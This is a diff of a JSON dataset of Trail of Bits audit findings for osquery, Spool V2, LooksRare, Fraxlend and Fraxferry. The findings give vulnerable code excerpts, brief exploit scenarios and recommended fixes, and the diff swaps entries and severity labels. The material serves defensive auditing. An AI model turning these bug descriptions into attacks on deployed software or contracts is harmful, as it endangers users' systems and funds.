void enumerateCarves(QueryData& results, const std::string& new_guid) { std::vector<std::string> carves; scanDatabaseKeys(kCarves, carves, kCarverDBPrefix); for (const auto& carveGuid : carves) { std::string carve; auto s = getDatabaseValue(kCarves, carveGuid, carve); if (!s.ok()) { VLOG(1) << \"Failed to retrieve carve GUID\"; continue; } JSON tree; s = tree.fromString(carve); if (!s.ok() || !tree.doc().IsObject()) { VLOG(1) << \"Failed to parse carve entries: \" << s.getMessage(); return; } Row r; if (tree.doc().HasMember(\"time\")) { r[\"time\"] = INTEGER(tree.doc()[\"time\"].GetUint64()); } if (tree.doc().HasMember(\"size\")) { r[\"size\"] = INTEGER(tree.doc()[\"size\"].GetInt()); } stringToRow(\"sha256\", r, tree); stringToRow(\"carve_guid\", r, tree); stringToRow(\"request_id\", r, tree); stringToRow(\"status\", r, tree); stringToRow(\"path\", r, tree); // This table can be used to request a new carve. // If this is the case then return this single result. auto new_request = (!new_guid.empty() && new_guid == r[\"carve_guid\"]); r[\"carve\"] = INTEGER((new_request) ? 1 : 0); results.push_back(r); } } } // namespace Figure 15.1: The enumerateCarves function truncates files of large sizes. Exploit Scenario An attacker creates a file on disk of a size that overflows 32 bits by only a small amount, such as 0x100001336. The carves table reports the file size incorrectly as 0x1336 bytes. The attacker bypasses checks based on the reported file size. Recommendations Short term, use GetUint64 instead of GetInt to retrieve the file size. Long term, use static analysis tools such as CodeQL to look for other instances in which a type of size int is retrieved from JSON and stored in an INTEGER field.", + "title": "35. Removing a strategy makes the smart vault unusable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Removing a strategy from a smart vault causes every subsequent deposit transaction to revert, making the smart vault unusable. The deposit function of the SmartVaultManager contract calls the depositAssets function on the DepositManager contract. The depositAssets function calls the checkDepositRatio function, which takes an argument called strategyRatios: function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender) returns (uint256[] memory, uint256) { ... // check if assets are in correct ratio checkDepositRatio( bag.assets, SpoolUtils.getExchangeRates(bag2.tokens, _priceFeedManager), bag2.allocations, SpoolUtils.getStrategyRatiosAtLastDhw(bag2.strategies, _strategyRegistry) ); ... return (_vaultDeposits[bag.smartVault][bag2.flushIndex].toArray(bag2.tokens.length), depositId); } Figure 35.1: The depositAssets function in spool-v2-core/DepositManager.sol The value of strategyRatios is fetched from the StrategyRegistry contract, which returns an empty array on ghost strategies. 
This empty array is then used in a for loop in the calculateFlushFactors function: function calculateFlushFactors( uint256[] memory exchangeRates, uint16a16 allocation, uint256[][] memory strategyRatios ) public pure returns (uint256[][] memory) { uint256[][] memory flushFactors = new uint256[][](strategyRatios.length); // loop over strategies for (uint256 i; i < strategyRatios.length; ++i) { flushFactors[i] = new uint256[](exchangeRates.length); uint256 normalization = 0; // loop over assets for (uint256 j = 0; j < exchangeRates.length; j++) { normalization += strategyRatios[i][j] * exchangeRates[j]; } // loop over assets for (uint256 j = 0; j < exchangeRates.length; j++) { flushFactors[i][j] = allocation.get(i) * strategyRatios[i][j] * PRECISION_MULTIPLIER / normalization; } } return flushFactors; } Figure 35.2: The calculateFlushFactors function in spool-v2-core/DepositManager.sol The statement calculating the value of normalization tries to access an index of the empty array and reverts with the Index out of bounds error, causing the deposit function to revert for every transaction thereafter. Exploit Scenario A Spool admin removes a strategy from a smart vault. Because of the presence of a ghost strategy, users' deposit transactions into the smart vault revert with the Index out of bounds error. Recommendations Short term, modify the calculateFlushFactors function so that it skips ghost strategies in the loop used to calculate the value of normalization. Long term, review the entire codebase, check the effects of removing strategies from smart vaults, and ensure that all of the functionality works for smart vaults with one or more ghost strategies.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "16. The time table may not null-terminate strings correctly ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The osquery time table uses strftime to format time information, such as the time zone name, into user-friendly strings. If the amount of information to be written does not fit in the provided buffer, strftime returns zero and leaves the buffer contents in an undefined state. QueryData genTime(QueryContext& context) { Row r; time_t osquery_time = getUnixTime(); struct tm gmt; gmtime_r(&osquery_time, &gmt); struct tm now = gmt; auto osquery_timestamp = toAsciiTime(&now); char local_timezone[5] = {0}; { struct tm local; localtime_r(&osquery_time, &local); strftime(local_timezone, sizeof(local_timezone), \"%Z\", &local); } char weekday[10] = {0}; strftime(weekday, sizeof(weekday), \"%A\", &now); char timezone[5] = {0}; strftime(timezone, sizeof(timezone), \"%Z\", &now); Figure 16.1: genTime uses strftime to get the time zone name and day of the week. The strings to be written vary depending on the locale configuration, so some strings may not fit in the provided buffer. The code does not check the return value of strftime and assumes that the string buffer is always null-terminated, which may not always be the case. Exploit Scenario An attacker finds a way to change the time zone on a system in which %Z shows the full time zone name. When the osquery agent attempts to respond to a query on the time table, it triggers undefined behavior. Recommendations Short term, add a check to verify the return value of each strftime call made by the table implementation. 
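(Returning to finding 35: a hedged sketch of calculateFlushFactors with the suggested skip, assuming a ghost strategy is recognizable by its empty ratio array. The uint16a16 allocation type of the real code is replaced by a plain array here.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Hedged sketch for finding 35.
contract FlushFactorsSketch {
    uint256 internal constant PRECISION_MULTIPLIER = 1e18;

    function calculateFlushFactors(
        uint256[] memory exchangeRates,
        uint256[] memory allocation,
        uint256[][] memory strategyRatios
    ) public pure returns (uint256[][] memory flushFactors) {
        flushFactors = new uint256[][](strategyRatios.length);
        for (uint256 i; i < strategyRatios.length; ++i) {
            flushFactors[i] = new uint256[](exchangeRates.length);
            // Ghost strategies have no ratios: leave their factors at zero
            // instead of indexing into an empty array.
            if (strategyRatios[i].length == 0) {
                continue;
            }
            uint256 normalization = 0;
            for (uint256 j = 0; j < exchangeRates.length; j++) {
                normalization += strategyRatios[i][j] * exchangeRates[j];
            }
            for (uint256 j = 0; j < exchangeRates.length; j++) {
                flushFactors[i][j] =
                    allocation[i] * strategyRatios[i][j] * PRECISION_MULTIPLIER / normalization;
            }
        }
    }
}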
If the function returns zero, ensure that the system writes a valid string in the buffer before it is used as part of the table response. Long term, perform code reviews on new contributions and consider using automated code analysis tools to prevent these kinds of issues from reoccurring.", + "title": "36. Issues with the management of access control roles in deployment script ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The deployment script does not properly manage or assign access control roles. As a result, the protocol will not work as expected, and the protocol's contracts cannot be upgraded. The deployment script has multiple issues regarding the assignment or transfer of access control roles. It fails to grant certain roles and to revoke temporary roles on deployment: Ownership of the ProxyAdmin contract is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, making the smart contracts non-upgradeable. The DEFAULT_ADMIN_ROLE role is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, leaving no way to manage roles after deployment. The ADMIN_ROLE_STRATEGY role is not assigned to the StrategyRegistry contract, which is required to grant the ROLE_STRATEGY role to a strategy contract. Because of this, new strategies cannot be registered. The ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM role is not assigned to the SmartVaultFactory contract, which is required to grant the ROLE_SMART_VAULT_ALLOW_REDEEM role to smartVault contracts. The ROLE_SMART_VAULT_MANAGER and ROLE_MASTER_WALLET_MANAGER roles are not assigned to the DepositManager and WithdrawalManager contracts, making them unable to move funds from the master wallet contract. We also found that the ROLE_SMART_VAULT_ADMIN role is not assigned to the smart vault owner when a new smart vault is created. This means that smart vault owners will not be able to manage their smart vaults. Exploit Scenario The Spool team deploys the smart contracts using the deployment script, but due to the issues described in this finding, the team is not able to perform the role management and upgrades when required. Recommendations Short term, modify the deployment script so that it does the following on deployment: Transfers ownership of the ProxyAdmin contract to an EOA, multisig wallet, or DAO Transfers the DEFAULT_ADMIN_ROLE role to an EOA, multisig wallet, or DAO Grants the required roles to the smart contracts Allows the SmartVaultFactory contract to grant the ROLE_SMART_VAULT_ADMIN role to owners of newly created smart vaults Long term, document all of the system's roles and interactions between components that require privileged roles. Make sure that all of the components are granted their required roles following the principle of least privilege to keep the protocol secure and functioning as expected.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "17. The elf_info table can crash the osquery agent ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The elf_info table uses the libelfin library to read properties of ELF files. The library maps the entire ELF binary into virtual memory and then uses memory accesses to read the data. 
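(A hedged sketch of the post-deployment wiring that finding 36 says the script omits. The interface shapes, constant derivations, and variable names are assumptions patterned on OpenZeppelin-style access control, not the actual Spool deployment code.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

interface IAccessControlLike {
    function grantRole(bytes32 role, address account) external;
}

interface IOwnableLike {
    function transferOwnership(address newOwner) external;
}

// Hedged sketch for finding 36: grant the roles the system needs and hand
// admin powers to a multisig before declaring deployment finished.
contract DeploymentWiringSketch {
    bytes32 internal constant DEFAULT_ADMIN_ROLE = 0x00;
    bytes32 internal constant ADMIN_ROLE_STRATEGY = keccak256("ADMIN_ROLE_STRATEGY");
    bytes32 internal constant ROLE_SMART_VAULT_MANAGER = keccak256("ROLE_SMART_VAULT_MANAGER");
    bytes32 internal constant ROLE_MASTER_WALLET_MANAGER = keccak256("ROLE_MASTER_WALLET_MANAGER");

    function wireRoles(
        IAccessControlLike accessControl,
        IOwnableLike proxyAdmin,
        address strategyRegistry,
        address depositManager,
        address withdrawalManager,
        address multisig
    ) external {
        accessControl.grantRole(ADMIN_ROLE_STRATEGY, strategyRegistry);
        accessControl.grantRole(ROLE_SMART_VAULT_MANAGER, depositManager);
        accessControl.grantRole(ROLE_MASTER_WALLET_MANAGER, depositManager);
        accessControl.grantRole(ROLE_SMART_VAULT_MANAGER, withdrawalManager);
        accessControl.grantRole(ROLE_MASTER_WALLET_MANAGER, withdrawalManager);
        accessControl.grantRole(DEFAULT_ADMIN_ROLE, multisig);
        proxyAdmin.transferOwnership(multisig); // keep the contracts upgradeable
    }
}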
Specifically, the load method of the mmap_loader class returns a pointer to the data for a given offset and size. To ensure that the memory access stays within the bounds of the memory-mapped file, the library checks that the result of adding the offset and the size is less than the size of the file. However, this check does not account for the possibility of overflows in the addition operation. For example, an offset of 0xffffffffffffffff and a size of 1 would overflow to the value 0. This makes it possible to bypass the check and to create references to memory outside of the bounds. The elf_info table indirectly uses this function when loading section headers from an ELF binary. class mmap_loader : public loader { public: void *base; size_t lim; mmap_loader(int fd) { off_t end = lseek(fd, 0, SEEK_END); if (end == (off_t)-1) throw system_error(errno, system_category(), \"finding file length\"); lim = end; base = mmap(nullptr, lim, PROT_READ, MAP_SHARED, fd, 0); if (base == MAP_FAILED) throw system_error(errno, system_category(), \"mmap'ing file\"); close(fd); } ... const void *load(off_t offset, size_t size) { if (offset + size > lim) throw range_error(\"offset exceeds file size\"); return (const char*)base + offset; } }; Figure 17.1: The libelfin library's limit check does not account for overflows. Exploit Scenario An attacker knows of a writable path in which osquery scans ELF binaries. He creates a malformed ELF binary, causing the pointer returned by the vulnerable function to point to an arbitrary location. He uses this to make the osquery agent crash, leak information from the process memory, or circumvent address space layout randomization (ASLR). Recommendations Short term, work with the developers of the libelfin project to account for overflows in the check. Long term, implement the recommendations in TOB-ATL-2 to minimize the impact of similar issues.", + "title": "37. Risk of DoS due to unbounded loops ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Guards and actions are run in unbounded loops. A smart vault creator can add too many guards and actions, potentially trapping the deposit and withdrawal functionality due to a lack of gas. The runGuards function calls all the configured guard contracts in a loop: function runGuards(address smartVaultId, RequestContext calldata context) external view { if (guardPointer[smartVaultId][context.requestType] == address(0)) { return; } GuardDefinition[] memory guards = _readGuards(smartVaultId, context.requestType); for (uint256 i; i < guards.length; ++i) { GuardDefinition memory guard = guards[i]; bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context); (bool success, bytes memory data) = guard.contractAddress.staticcall(encoded); _checkResult(success, data, guard.operator, guard.expectedValue, i); } } Figure 37.1: The runGuards function in spool-v2-core/GuardManager.sol Multiple conditions can cause this loop to run out of gas: The vault creator adds too many guards. One of the guard contracts consumes a high amount of gas. A guard starts consuming a high amount of gas after a specific block or at a specific state. If user transactions reach out-of-gas errors due to these conditions, smart vaults can become unusable, and funds can become stuck in the protocol. A similar issue affects the runActions function in the ActionManager contract. 
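(A hedged sketch of one mitigation for finding 37: bound the guard count when a vault is configured, so the runGuards loop cannot grow without limit. MAX_GUARDS and the storage shape are assumptions; a per-call gas allowance on the staticcall would additionally blunt a single expensive guard.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Hedged sketch for finding 37.
contract GuardManagerSketch {
    struct GuardDefinition { address contractAddress; bytes4 selector; }

    uint256 internal constant MAX_GUARDS = 10; // assumed cap

    mapping(address => GuardDefinition[]) internal _guards;

    error TooManyGuards(uint256 provided, uint256 max);

    function setGuards(address smartVault, GuardDefinition[] calldata guards) external {
        if (guards.length > MAX_GUARDS) {
            revert TooManyGuards(guards.length, MAX_GUARDS);
        }
        delete _guards[smartVault];
        for (uint256 i; i < guards.length; ++i) {
            _guards[smartVault].push(guards[i]);
        }
    }
}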
Exploit Scenario Eve creates a smart vault with an upgradeable guard contract. Later, when users have made large deposits, Eve upgrades the guard contract to consume all of the available gas to trap user deposits in the smart vault for as long as she wants. Recommendations Short term, model all of the system's variable-length loops, including the ones used by runGuards and runActions, to ensure they cannot block contract execution within expected system parameters. Long term, carefully audit operations that consume a large amount of gas, especially those in loops.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "2. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The owner of a LooksRare protocol contract can be changed by calling the transferOwnership function in OpenZeppelin's Ownable contract. This function internally calls the _transferOwnership function, which immediately sets the contract's new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), \"Ownable: new owner is the zero address\"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 2.1: OpenZeppelin's Ownable contract Exploit Scenario Alice and Bob invoke the transferOwnership() function on the LooksRare multisig wallet to change the address of an existing contract's owner. They accidentally enter the wrong address, and ownership of the contract is transferred to the incorrect address. As a result, access to the contract is permanently revoked. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts (appendix E) and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "title": "38. Unsafe casts throughout the codebase ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The codebase contains unsafe casts that could cause mathematical errors if they are reachable in certain states. Examples of possible unsafe casts are shown in figures 38.1 and 38.2. 
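(Before the original snippets, reproduced below as figures 38.1 and 38.2, a hedged sketch of the checked alternative using OpenZeppelin's SafeCast, which reverts on overflow instead of silently truncating; the storage layout is a stand-in for DepositManager.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

import {SafeCast} from "@openzeppelin/contracts/utils/math/SafeCast.sol";

interface ISmartVaultLike {
    function totalSupply() external view returns (uint256);
}

// Hedged sketch for finding 38.
contract SafeCastSketch {
    struct FlushShares { uint128 flushSvtSupply; uint128 mintedVaultShares; }

    mapping(address => mapping(uint256 => FlushShares)) internal _flushShares;

    function recordFlushSupply(address smartVault, uint256 flushIndex) external {
        // toUint128 reverts if totalSupply does not fit, instead of wrapping.
        _flushShares[smartVault][flushIndex].flushSvtSupply =
            SafeCast.toUint128(ISmartVaultLike(smartVault).totalSupply());
    }
}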
function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { [...] _flushShares[smartVault][flushIndex].flushSvtSupply = uint128(ISmartVault(smartVault).totalSupply()) ; return _strategyRegistry.addDeposits(strategies, distribution); } Figure 38.1: A possible unsafe cast in spool-v2-core/DepositManager.sol#L220 function syncDeposits( address smartVault, uint256 [3] calldata bag, // uint256 flushIndex, // uint256 lastDhwSyncedTimestamp, // uint256 oldTotalSVTs, address [] calldata strategies, uint16a16[2] calldata dhwIndexes, address [] calldata assetGroup, SmartVaultFees calldata fees ) external returns (DepositSyncResult memory ) { [...] if (syncResult.mintedSVTs > 0) { _flushShares[smartVault][bag[0]].mintedVaultShares = uint128 (syncResult.mintedSVTs) ; [...] } return syncResult; } Figure 38.2: A possible unsafe cast in spool-v2-core/DepositManager.sol#L243 Recommendations Short term, review the codebase to identify all of the casts that may be unsafe. Analyze whether these casts could be a problem in the current codebase and, if they are unsafe, make the necessary changes to make them safe. Long term, when implementing potentially unsafe casts, always include comments to explain why those casts are safe in the context of the codebase.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { @@ -4968,7 +7616,7 @@ "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -4987,17 +7635,7 @@ "body": "A Fraxlend pair can have a maturity date, after which a penalty rate is applied to the interest to be paid by the borrowers. However, the penalty rate is also applied to the amount of time immediately before the maturity date. As shown in gure 3.1, the _addInterest function checks whether a pair is past maturity. If it is, the function sets the new rate (the _newRate parameter) to the penalty rate (the penaltyRate parameter) and then uses it to calculate the matured interest. The function should apply the penalty rate only to the time between the maturity date and the current time; however, it also applies the penalty rate to the time between the last interest accrual ( _deltaTime ) and the maturity date, which should be subject only to the normal interest rate. function _addInterest () // [...] uint256 _deltaTime = block.timestamp - _currentRateInfo.lastTimestamp; // [...] if (_isPastMaturity()) { _newRate = uint64 (penaltyRate); } else { // [...] // Effects: bookkeeping _currentRateInfo.ratePerSec = _newRate; _currentRateInfo.lastTimestamp = uint64 ( block.timestamp ); _currentRateInfo.lastBlock = uint64 ( block.number ); // Calculate interest accrued _interestEarned = (_deltaTime * _totalBorrow.amount * _currentRateInfo.ratePerSec) / 1e18; Figure 3.1: The _addInterest function in FraxlendPairCore.sol#L406-L494 Exploit Scenario A Fraxlend pairs maturity date is 100, the delta time (the last time interest accrued) is 90, and the current time is 105. Alice decides to repay her debt. The _addInterest function is executed, and the penalty rate is also applied to the interest accrual and the maturity date. As a result, Alice owes more in interest than she should. 
Recommendations Short term, modify the associated code so that if the _isPastMaturity branch is taken and the _currentRateInfo.lastTimestamp value is less than the maturityDate value, the penalty interest rate is applied only for the amount of time after the maturity date. Long term, identify edge cases that could occur in the interest accrual process and implement unit tests and fuzz tests to validate them.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "7. Contracts used as dependencies do not track upstream changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare codebase uses a third-party contract, SignatureChecker , but the LooksRare documentation does not specify which version of the contract is used or whether it was modified. This indicates that the LooksRare protocol does not track upstream changes in contracts used as dependencies. Therefore, the LooksRare contracts may not reliably reflect updates or security fixes implemented in their dependencies, as those updates must be manually integrated into the contracts. Exploit Scenario A third-party contract used in LooksRare receives an update with a critical fix for a vulnerability, but the update is not manually integrated in the LooksRare version of the contract. An attacker detects the use of a vulnerable contract in the LooksRare protocol and exploits the vulnerability against one of the contracts. Recommendations Short term, review the codebase and document the source and version of each dependency. Include third-party sources as submodules in the project's Git repository to maintain internal path consistency and ensure that dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project.", - "labels": [ - "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Low" ] }, @@ -5008,7 +7646,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: Medium" ] }, { @@ -5027,7 +7665,7 @@ "body": "A Fraxlend custom pair can include a list of approved lenders; these are the only lenders who can deposit the underlying asset into the given pair and receive the corresponding fTokens. However, the system does not perform checks when users transfer fTokens; as a result, approved lenders could send fTokens to unapproved addresses. Although unapproved addresses can only redeem fTokens sent to them (meaning this issue is not security-critical), the ability for approved lenders to send fTokens to unapproved addresses conflicts with the currently documented behavior. function deposit ( uint256 _amount , address _receiver ) external nonReentrant isNotPastMaturity whenNotPaused approvedLender(_receiver) returns ( uint256 _sharesReceived ) {...} Figure 6.1: The deposit function in FraxlendPairCore.sol#L587-L594 Exploit Scenario Bob, an approved lender, deposits 100 asset tokens and receives 90 fTokens. He then sends the fTokens to an unapproved address, causing other users to worry about the state of the protocol. Recommendations Short term, override the _beforeTokenTransfer function by applying the approvedLender modifier to it. Alternatively, document the ability for approved lenders to send fTokens to unapproved addresses. 
Long term, when applying access controls to token owners, make sure to evaluate all the possible ways in which a token can be transferred and document the expected behavior.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, { @@ -5037,8 +7675,8 @@ "body": "The FraxlendPairDeployer contract, which is used to deploy new pairs, does not allow contracts that contain fewer than 13,000 bytes of code to be deployed. To deploy new pairs, users call the deploy or deployCustom function, which then internally calls _deployFirst . This function uses the create2 opcode to create a contract for the pair by concatenating the bytecode stored in contractAddress1 and contractAddress2 . The setCreationCode function, which uses solmate's SSTORE2 library to store the bytecode for use by create2 , splits the bytecode into two separate contracts ( contractAddress1 and contractAddress2 ) if the _creationCode size is greater than 13,000. function setCreationCode ( bytes calldata _creationCode) external onlyOwner { bytes memory _firstHalf = BytesLib.slice(_creationCode, 0 , 13000 ); contractAddress1 = SSTORE2.write(_firstHalf); if (_creationCode.length > 13000 ) { bytes memory _secondHalf = BytesLib.slice(_creationCode, 13000 , _creationCode.length - 13000 ); contractAddress2 = SSTORE2.write(_secondHalf); } } Figure 7.1: The setCreationCode function in FraxlendPairDeployer.sol#L173-L180 The first problem is that if the _creationCode size is less than 13,000, BytesLib.slice will revert with the slice_outOfBounds error, as shown in figure 7.2. function slice ( bytes memory _bytes, uint256 _start , uint256 _length ) internal pure returns ( bytes memory ) { require (_length + 31 >= _length, \"slice_overflow\" ); require (_bytes.length >= _start + _length, \"slice_outOfBounds\" ); Figure 7.2: The BytesLib.slice function from the solidity-bytes-utils library Assuming that the first problem does not exist, another problem arises from the use of SSTORE2.read in the _deployFirst function (figure 7.3). If the creation code was less than 13,000 bytes, contractAddress2 would be set to address(0) . This would cause the SSTORE2.read function's pointer.code.length - DATA_OFFSET computation, shown in figure 7.4, to underflow, causing the SSTORE2.read operation to panic. function _deployFirst ( // [...] ) private returns ( address _pairAddress ) { { // [...] bytes memory _creationCode = BytesLib.concat( SSTORE2.read(contractAddress1), SSTORE2.read(contractAddress2) ); Figure 7.3: The _deployFirst function in FraxlendPairDeployer.sol#L212-L231 uint256 internal constant DATA_OFFSET = 1 ; function read ( address pointer ) internal view returns ( bytes memory ) { return readBytecode(pointer, DATA_OFFSET, pointer.code.length - DATA_OFFSET ); } Figure 7.4: The SSTORE2.read function from the solmate library Exploit Scenario Bob, the FraxlendPairDeployer contract's owner, wants to set the creation code to be a contract with fewer than 13,000 bytes. When he calls setCreationCode , it reverts. Recommendations Short term, make the following changes: In setCreationCode , in the line that sets the _firstHalf variable, replace 13000 in the third argument of BytesLib.slice with min(13000, _creationCode.length) . In _deployFirst , add a check to ensure that the SSTORE2.read(contractAddress2) operation executes only if contractAddress2 is not address(0) . Alternatively, document the fact that it is not possible to deploy contracts with fewer than 13,000 bytes. 
Long term, improve the projects unit tests and fuzz tests to check that the functions behave as expected and cannot unexpectedly revert.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Low" ] }, { @@ -5047,8 +7685,8 @@ "body": "The setCreationCode function permits the owner of FraxlendPairDeployer to set the bytecode that will be used to create contracts for newly deployed pairs. If the _creationCode size is greater than 13,000 bytes, it will be split into two separate contracts ( contractAddress1 and contractAddress2 ). However (assuming that TOB-FXLEND-7 were xed), if a FraxlendPairDeployer owner were to change the creation code from one of greater than 13,000 bytes to one of fewer than 13,000 bytes, contractAddress2 would not be reset to address(0) ; therefore, contractAddress2 would still contain the second half of the previous creation code. function setCreationCode ( bytes calldata _creationCode) external onlyOwner { bytes memory _firstHalf = BytesLib.slice(_creationCode, 0 , 13000 ); contractAddress1 = SSTORE2.write(_firstHalf); if (_creationCode.length > 13000 ) { bytes memory _secondHalf = BytesLib.slice(_creationCode, 13000 , _creationCode.length - 13000 ); contractAddress2 = SSTORE2.write(_secondHalf); } } Figure 8.1: The setCreationCode function in FraxlendPairDeployer.sol#L173-L180 Exploit Scenario Bob, FraxlendPairDeployer s owner, changes the creation code from one of more than 13,000 bytes to one of less than 13,000 bytes. As a result, deploy and deployCustom deploy contracts with unexpected bytecode. Recommendations Short term, modify the setCreationCode function so that it sets contractAddress2 to address(0) at the beginning of the function . Long term, improve the projects unit tests and fuzz tests to check that the functions behave as expected and cannot unexpectedly revert.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Medium" ] }, { @@ -5057,8 +7695,8 @@ "body": "The setFee and setMinWaitPeriods functions do not have appropriate checks. First, the setFee function does not have an upper limit, which means that the Fraxferry owner can set enormous fees. Second, the setMinWaitPeriods function does not require the new value to be at least one hour. A minimum waiting time of less than one hour would invalidate important safety assumptions. For example, in the event of a reorganization on the source chain, the minimum one-hour waiting time ensures that only transactions after the reorganization are ferried (as described in the code comment in gure 9.1). ** - Reorgs on the source chain. Avoided, by only returning the transactions on the source chain that are at least one hour old. ** - Rollbacks of optimistic rollups. Avoided by running a node. ** - Operators do not have enough time to pause the chain after a fake proposal. Avoided by requiring a minimal amount of time between sending the proposal and executing it. // [...] 
function setFee ( uint _FEE ) external isOwner { FEE=_FEE; emit SetFee(_FEE); } function setMinWaitPeriods ( uint _MIN_WAIT_PERIOD_ADD , uint _MIN_WAIT_PERIOD_EXECUTE ) external isOwner { MIN_WAIT_PERIOD_ADD=_MIN_WAIT_PERIOD_ADD; MIN_WAIT_PERIOD_EXECUTE=_MIN_WAIT_PERIOD_EXECUTE; emit SetMinWaitPeriods(_MIN_WAIT_PERIOD_ADD, _MIN_WAIT_PERIOD_EXECUTE); } Figure 9.1: The setFee and setMinWaitPeriods functions in Fraxferry.sol#L226-L235 Exploit Scenario Bob, Fraxferry s owner, calls setMinWaitPeriods with a _MIN_WAIT_PERIOD_ADD value lower than 3,600 (one hour) , invalidating the waiting periods protection regarding chain reorganizations. Recommendations Short term, add an upper limit check to the setFee function; add a check to the setMinWaitPeriods function to ensure that _MIN_WAIT_PERIOD_ADD and _MIN_WAIT_PERIOD_EXECUTE are at least 3,600 (one hour). Long term, make sure that conguration variables can be set only to valid values.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { @@ -5067,8 +7705,8 @@ "body": "The depart function performs an unsafe cast operation that could result in an invalid batch. Users who want to send tokens to a certain chain use the various embark* functions. These functions eventually call embarkWithRecipient , which adds the relevant transactions to the transactions array. function embarkWithRecipient ( uint amount , address recipient ) public notPaused { // [...] transactions.push(Transaction(recipient,amountAfterFee, uint32 ( block.timestamp ))); } Figure 10.1: The embarkWithRecipient function in Fraxferry.sol#L127-L135 At a certain point, the captain role calls depart with the start and end indices within transactions to specify the transactions inside of a batch. However, the depart function performs an unsafe cast operation when creating the new batch; because of this unsafe cast operation, an end value greater than 2 ** 64 would be cast to a value lower than the start value, breaking the invariant that end is greater than or equal to start . function depart ( uint start , uint end , bytes32 hash ) external notPaused isCaptain { require ((batches.length== 0 && start== 0 ) || (batches.length> 0 && start==batches[batches.length- 1 ].end+ 1 ), \"Wrong start\" ); require (end>=start, \"Wrong end\" ); batches.push(Batch( uint64 (start), uint64 (end), uint64 ( block.timestamp ), 0 , hash )); emit Depart(batches.length- 1 ,start,end, hash ); } Figure 10.2: The depart function in Fraxferry.sol#L155-L160 If the resulting incorrect batch is not disputed by the crew member roles, which would cause the system to enter a paused state, the rst ocer role will call disembark to actually execute the transactions on the target chain. However, the disembark functions third check, highlighted in gure 10.3, on the invalid transaction will fail, causing the transaction to revert and the system to stop working until the incorrect batch is removed with a call to removeBatches . function disembark (BatchData calldata batchData) external notPaused isFirstOfficer { Batch memory batch = batches[executeIndex++]; require (batch.status== 0 , \"Batch disputed\" ); require (batch.start==batchData.startTransactionNo, \"Wrong start\" ); require (batch.start+batchData.transactions.length- 1 ==batch.end, \"Wrong size\" ); require ( block.timestamp -batch.departureTime>=MIN_WAIT_PERIOD_EXECUTE, \"Too soon\" ); // [...] 
